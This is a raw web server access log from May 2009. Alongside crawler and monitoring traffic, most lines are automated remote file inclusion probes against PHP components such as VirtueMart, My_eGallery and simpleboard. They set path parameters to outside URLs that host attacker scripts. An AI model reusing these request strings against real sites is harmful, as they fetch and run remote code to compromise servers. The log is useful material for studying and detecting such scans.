209.59.12.99 - - [25/May/2009:00:00:15 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.143.81.26 - - [25/May/2009:00:00:28 -0400] "GET /logs/access_log.Q109051100%20%20//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.neuropatia.it/forum/docs/LOG?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
110.45.145.66 - - [25/May/2009:00:00:34 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
77.221.159.43 - - [25/May/2009:00:00:48 -0400] "GET /logs/access_log.Q109051100%20%20//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.neuropatia.it/forum/docs/LOG?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
83.143.81.26 - - [25/May/2009:00:01:04 -0400] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.neuropatia.it/forum/docs/LOG?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
83.143.81.26 - - [25/May/2009:00:01:04 -0400] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.neuropatia.it/forum/docs/LOG?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
83.143.81.26 - - [25/May/2009:00:01:04 -0400] "GET /logs/access_log.Q109050900//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.neuropatia.it/forum/docs/LOG?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
83.143.81.26 - - [25/May/2009:00:01:44 -0400] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.neuropatia.it/forum/docs/LOG?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
83.143.81.26 - - [25/May/2009:00:01:44 -0400] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.neuropatia.it/forum/docs/LOG?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
83.143.81.26 - - [25/May/2009:00:01:44 -0400] "GET /logs/access_log.Q109050900//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.neuropatia.it/forum/docs/LOG?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
77.221.159.43 - - [25/May/2009:00:01:47 -0400] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.neuropatia.it/forum/docs/LOG?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
77.221.159.43 - - [25/May/2009:00:01:47 -0400] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.neuropatia.it/forum/docs/LOG?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
77.221.159.43 - - [25/May/2009:00:01:47 -0400] "GET /logs/access_log.Q109050900//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.neuropatia.it/forum/docs/LOG?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
220.181.7.97 - - [25/May/2009:00:02:30 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
66.249.72.114 - - [25/May/2009:00:02:41 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L000AE24868B1A300C3ED05B+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
83.143.81.26 - - [25/May/2009:00:02:59 -0400] "GET /logs/access_log.Q109051100//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.neuropatia.it/forum/docs/LOG?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
77.221.159.43 - - [25/May/2009:00:03:12 -0400] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.neuropatia.it/forum/docs/LOG?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
77.221.159.43 - - [25/May/2009:00:03:13 -0400] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.neuropatia.it/forum/docs/LOG?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
77.221.159.43 - - [25/May/2009:00:03:13 -0400] "GET /logs/access_log.Q109050900//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.neuropatia.it/forum/docs/LOG?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
221.139.50.3 - - [25/May/2009:00:03:22 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
221.139.50.3 - - [25/May/2009:00:03:22 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
221.139.50.3 - - [25/May/2009:00:03:22 -0400] "GET /logs/access_log.Q109042200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
83.143.81.26 - - [25/May/2009:00:03:36 -0400] "GET /logs/access_log.Q109051100//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.neuropatia.it/forum/docs/LOG?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
211.233.22.209 - - [25/May/2009:00:03:40 -0400] "GET /logs/error_log.Q109051400//components/com_simpleboard/image_upload.php?sbp=http://www.casualife.ru/Top.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.79"
211.233.22.209 - - [25/May/2009:00:03:40 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.casualife.ru/Top.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
211.233.22.209 - - [25/May/2009:00:03:41 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.casualife.ru/Top.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
123.125.64.38 - - [25/May/2009:00:03:49 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
77.221.159.43 - - [25/May/2009:00:04:17 -0400] "GET /logs/access_log.Q109051100//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.neuropatia.it/forum/docs/LOG?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
88.183.32.67 - - [25/May/2009:00:04:20 -0400] "GET /logs/index.php?pagina=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
88.183.32.67 - - [25/May/2009:00:04:20 -0400] "GET /logs/access_log.Q109022800%20%20/index.php?pagina=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
88.183.32.67 - - [25/May/2009:00:04:29 -0400] "GET /index.php?pagina=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
88.183.32.67 - - [25/May/2009:00:04:31 -0400] "GET /logs/access_log.Q109013000%20%20/index.php?pagina=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:00:04:53 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:00:04:53 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
209.59.12.99 - - [25/May/2009:00:05:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.221.159.43 - - [25/May/2009:00:05:43 -0400] "GET /logs/access_log.Q109051100//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.neuropatia.it/forum/docs/LOG?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
88.183.32.67 - - [25/May/2009:00:06:09 -0400] "GET //modules/My_eGallery/index.php?basepath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
88.183.32.67 - - [25/May/2009:00:06:11 -0400] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
88.183.32.67 - - [25/May/2009:00:06:14 -0400] "GET //modules/My_eGallery/index.php?basepath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
88.183.32.67 - - [25/May/2009:00:06:14 -0400] "GET /logs/access_log.Q109051100%20%20//modules/My_eGallery/index.php?basepath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
88.183.32.67 - - [25/May/2009:00:06:18 -0400] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
88.191.103.144 - - [25/May/2009:00:07:04 -0400] "GET /logs/error_log.Q108102800//modules/My_eGallery/public/displayCategory.php?basepath=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:00:07:04 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:00:07:04 -0400] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.825"
203.151.233.106 - - [25/May/2009:00:07:17 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
203.151.233.106 - - [25/May/2009:00:07:17 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
203.151.233.106 - - [25/May/2009:00:07:17 -0400] "GET /logs/access_log.Q109051100%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:00:07:20 -0400] "GET /logs/error_log.Q109051400//[path]/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:00:07:26 -0400] "GET /logs/error_log.Q109051800//[path]/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
121.130.29.11 - - [25/May/2009:00:07:33 -0400] "GET /logs/access_log.Q109051100%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
121.130.29.11 - - [25/May/2009:00:07:33 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
121.130.29.11 - - [25/May/2009:00:07:34 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.234.107.233 - - [25/May/2009:00:08:42 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.234.107.233 - - [25/May/2009:00:08:42 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
211.234.107.233 - - [25/May/2009:00:08:42 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
66.249.72.114 - - [25/May/2009:00:08:46 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L000AE24869518300C4ED05B+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
88.183.32.67 - - [25/May/2009:00:08:57 -0400] "GET /logs/access_log.Q109050700%20%20//modules/My_eGallery/index.php?basepath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
65.55.105.231 - - [25/May/2009:00:08:58 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.231 - - [25/May/2009:00:08:59 -0400] "GET /logs/error_log.Q108111200 HTTP/1.1" 404 223 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
88.84.128.40 - - [25/May/2009:00:09:16 -0400] "GET /logs/error_log.Q108102800//modules/My_eGallery/public/displayCategory.php?basepath=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:00:09:17 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:00:09:17 -0400] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.803"
190.54.28.163 - - [25/May/2009:00:09:23 -0400] "GET /logs/access_log.Q109051100//errors.php?error=http://www.twikeolink.com/tiny_templates_c/idste.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
190.54.28.163 - - [25/May/2009:00:09:28 -0400] "GET //errors.php?error=http://www.twikeolink.com/tiny_templates_c/idste.txt? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
190.54.28.163 - - [25/May/2009:00:09:33 -0400] "GET /logs//errors.php?error=http://www.twikeolink.com/tiny_templates_c/idste.txt? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
67.15.188.3 - - [25/May/2009:00:10:09 -0400] "GET //include/lib.inc.php?site_path=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:00:10:09 -0400] "GET /logs/error_log.Q108101100%20%20//include/lib.inc.php?site_path=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:00:10:09 -0400] "GET /logs//include/lib.inc.php?site_path=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:00:10:11 -0400] "GET /logs//include/lib.inc.php?site_path=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:00:10:11 -0400] "GET //include/lib.inc.php?site_path=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:00:10:11 -0400] "GET /logs/error_log.Q108101100%20%20//include/lib.inc.php?site_path=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
209.59.12.99 - - [25/May/2009:00:10:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.15.188.3 - - [25/May/2009:00:10:44 -0400] "GET /logs/error_log.Q109042700%20%20//include/lib.inc.php?site_path=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:00:10:44 -0400] "GET /logs/error_log.Q108091600%20%20//include/lib.inc.php?site_path=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:00:10:48 -0400] "GET /logs/error_log.Q109042700%20%20//include/lib.inc.php?site_path=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:00:10:49 -0400] "GET /logs/error_log.Q108091600%20%20//include/lib.inc.php?site_path=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:00:11:04 -0400] "GET /logs/error_log.Q108083100%20%20//include/lib.inc.php?site_path=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:00:11:06 -0400] "GET /logs/error_log.Q108083100%20%20//include/lib.inc.php?site_path=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:00:11:21 -0400] "GET /logs/access_log.Q109050300%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
216.151.134.36 - - [25/May/2009:00:11:59 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
216.151.134.36 - - [25/May/2009:00:11:59 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
216.151.134.36 - - [25/May/2009:00:11:59 -0400] "GET /logs/error_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
216.151.134.36 - - [25/May/2009:00:12:06 -0400] "GET /logs/error_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
221.139.50.3 - - [25/May/2009:00:12:08 -0400] "GET /logs/access_log.Q109051800%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:00:12:31 -0400] "GET //include/lib.inc.php?site_path=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:00:12:31 -0400] "GET /logs//include/lib.inc.php?site_path=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:00:12:31 -0400] "GET /logs/error_log.Q108101100%20%20//include/lib.inc.php?site_path=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:00:12:46 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:00:12:46 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:00:12:46 -0400] "GET /logs/error_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
41.210.252.11 - - [25/May/2009:00:13:02 -0400] "GET /logs/access_log.Q109012800 HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
58.227.193.198 - - [25/May/2009:00:13:03 -0400] "GET /logs/error_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.75.91.19 - - [25/May/2009:00:13:03 -0400] "GET /logs/access_log.Q109012800 HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
64.27.19.152 - - [25/May/2009:00:13:08 -0400] "GET /logs/access_log.Q109011500 HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
67.15.188.3 - - [25/May/2009:00:13:15 -0400] "GET /logs/error_log.Q109042700//include/lib.inc.php?site_path=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:00:13:20 -0400] "GET /logs/error_log.Q109050500//include/lib.inc.php?site_path=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:00:13:21 -0400] "GET /logs/error_log.Q109042700//include/lib.inc.php?site_path=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:00:13:23 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:00:13:23 -0400] "GET /logs/error_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:00:13:24 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:00:13:26 -0400] "GET /logs/error_log.Q109050500//include/lib.inc.php?site_path=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
216.151.134.36 - - [25/May/2009:00:13:30 -0400] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
216.151.134.36 - - [25/May/2009:00:13:30 -0400] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
216.151.134.36 - - [25/May/2009:00:13:30 -0400] "GET /logs/access_log.Q108062800//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
110.45.146.88 - - [25/May/2009:00:13:30 -0400] "GET /logs/access_log.Q108091100/?sourcedir=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 225 "-" "libwww-perl/5.65"
110.45.146.88 - - [25/May/2009:00:13:30 -0400] "GET /logs/?sourcedir=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 200 2758 "-" "libwww-perl/5.65"
110.45.146.88 - - [25/May/2009:00:13:30 -0400] "GET /?sourcedir=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 200 409 "-" "libwww-perl/5.65"
200.93.147.154 - - [25/May/2009:00:13:35 -0400] "GET /logs/error_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:00:13:35 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:00:13:35 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:00:13:42 -0400] "GET /logs/error_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:00:13:44 -0400] "GET /logs/error_log.Q109042700%20%20//include/lib.inc.php?site_path=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
216.151.134.36 - - [25/May/2009:00:13:45 -0400] "GET /logs/access_log.Q108052200//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:00:13:49 -0400] "GET /logs/error_log.Q108091600%20%20//include/lib.inc.php?site_path=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:00:13:54 -0400] "GET /logs/error_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
110.45.146.88 - - [25/May/2009:00:14:19 -0400] "GET /logs/access_log.Q108061800/?sourcedir=http://maehongson.nfe.go.th/budget3/image/id.jpg??? HTTP/1.1" 404 225 "-" "libwww-perl/5.65"
221.139.50.3 - - [25/May/2009:00:14:19 -0400] "GET /logs/access_log.Q109042200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:00:14:22 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:00:14:22 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:00:14:22 -0400] "GET /logs/error_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:00:14:23 -0400] "GET /logs/error_log.Q108083100%20%20//include/lib.inc.php?site_path=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:00:14:36 -0400] "GET /logs/error_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
88.183.32.67 - - [25/May/2009:00:14:37 -0400] "GET /index.php?pagina=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
88.183.32.67 - - [25/May/2009:00:14:39 -0400] "GET /logs/access_log.Q109013000%20%20/index.php?pagina=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
88.183.32.67 - - [25/May/2009:00:14:41 -0400] "GET /logs/index.php?pagina=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
88.183.32.67 - - [25/May/2009:00:14:41 -0400] "GET /logs/access_log.Q109022800%20%20/index.php?pagina=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.151.134.36 - - [25/May/2009:00:14:47 -0400] "GET /logs/access_log.Q108062800%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
216.151.134.36 - - [25/May/2009:00:14:48 -0400] "GET /logs/access_log.Q108052200%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
211.233.22.209 - - [25/May/2009:00:14:57 -0400] "GET /logs/error_log.Q109051400//components/com_simpleboard/image_upload.php?sbp=http://www.tmt.org.ru/readme.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.79"
211.233.22.209 - - [25/May/2009:00:14:58 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.tmt.org.ru/readme.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
